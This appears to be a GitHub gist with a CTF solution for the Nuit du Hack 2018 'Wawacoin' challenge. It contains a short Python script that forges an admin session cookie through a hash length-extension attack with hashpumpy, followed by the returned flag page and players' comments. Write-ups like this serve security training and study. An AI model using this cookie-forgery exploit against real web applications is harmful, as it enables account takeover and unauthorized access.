Last active
April 2, 2018 04:21
-
-
Save becojo/17dbd49b5e8f25d9d7534afc2ed76c64 to your computer and use it in GitHub Desktop.
Nuit du hack CTF quals 2018 - Wawacoin
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from hashpumpy import hashpump | |
url = 'http://wawacoin.challs.malice.fr/manager' | |
data = '757365723d64656d6f'.decode('hex') | |
signature = '9183ff6055a46981f2f71cd36430ed3d9cbf6861' | |
(m2_s, m2) = hashpump(signature, data, "&user=admin", 16) | |
session = m2.encode('hex') + '|' + m2_s | |
print requests.get(url, cookies={'session': session}, allow_redirects=False).content |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!doctype html> | |
<html lang="en"> | |
<head> | |
<meta charset="utf-8"> | |
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | |
<meta name="description" content=""> | |
<meta name="author" content=""> | |
<title>Wawacoin - THE FLAG IS HERE ! FLAG ON THIS PAGE FLAAAAG</title> | |
<!-- Bootstrap core CSS --> | |
<link href="/static/css/bootstrap.min.css" rel="stylesheet"> | |
<!-- Custom styles for this template --> | |
<link href="/static/css/wawacoin.css" rel="stylesheet"> | |
<link href="/static/css/fontawesome-all.min.css" rel="stylesheet"> | |
</head> | |
<body> | |
<div class="container"> | |
<header class="masthead"> | |
<h3 class="text-muted">Wawacoin</h3> | |
<nav class="navbar navbar-expand-md navbar-light bg-light rounded mb-3"> | |
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation"> | |
<span class="navbar-toggler-icon"></span> | |
</button> | |
<div class="collapse navbar-collapse" id="navbarCollapse"> | |
<ul class="navbar-nav text-md-center nav-justified w-100"> | |
<li class="nav-item active"> | |
<a class="nav-link" href="/">Home</a> | |
</li> | |
<li class="nav-item"> | |
<a class="nav-link" href="/register">Registration</a> | |
</li> | |
<li class="nav-item"> | |
<a class="nav-link" href="/logout">Logout (admin)</a> | |
</li> | |
</ul> | |
</div> | |
</nav> | |
</header> | |
<main role="main"> | |
<div class="jumbotron"> | |
<h1>Congratz. You stole all my BaitCoins. The flag is <b>NDH{c7774051db4b880da67598770c955ff99363e76d}</b>.</h1> | |
</div> | |
</main> | |
<!-- Site footer --> | |
<footer class="footer"> | |
<p>© Wawacoin - <b>Kernel Redirection @0x79797979</b></p> | |
</footer> | |
</div> <!-- /container --> | |
<script src="/static/js/jquery-3.2.1.min.js"></script> | |
<script src="/static/js/bootstrap.min.js"></script> | |
<script src="/static/js/Chart.bundle.min.js"></script> | |
<script src="/static/js/wawacoin.js"></script> | |
<!-- <script src="/js/wawacoin-miner.js">miner_start('CR1n0YrCANNoGM1GNiSS3uGstI');</script> (This is not the flag.) !--> | |
</body> | |
</html> |
@BookGin If you do it on /login
it redirects you to /manager
where the flag is 🤔
@becojo We only check the reponse status code and content, unfortunately.
Thanks for your writeup!
(BTW, it seems that we both attended DefCamp CTF Finals last year 😄 )
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
We spent almost 6+ hours hashpumping the session to the wrong url....... (
/login
and/stealmoney
) 😢By the way, the HTML comment
CR1n0YrCANNoGM1GNiSS3uGstI
can be reversed, which meansIt's guessing 1M gonna cry on IRC
.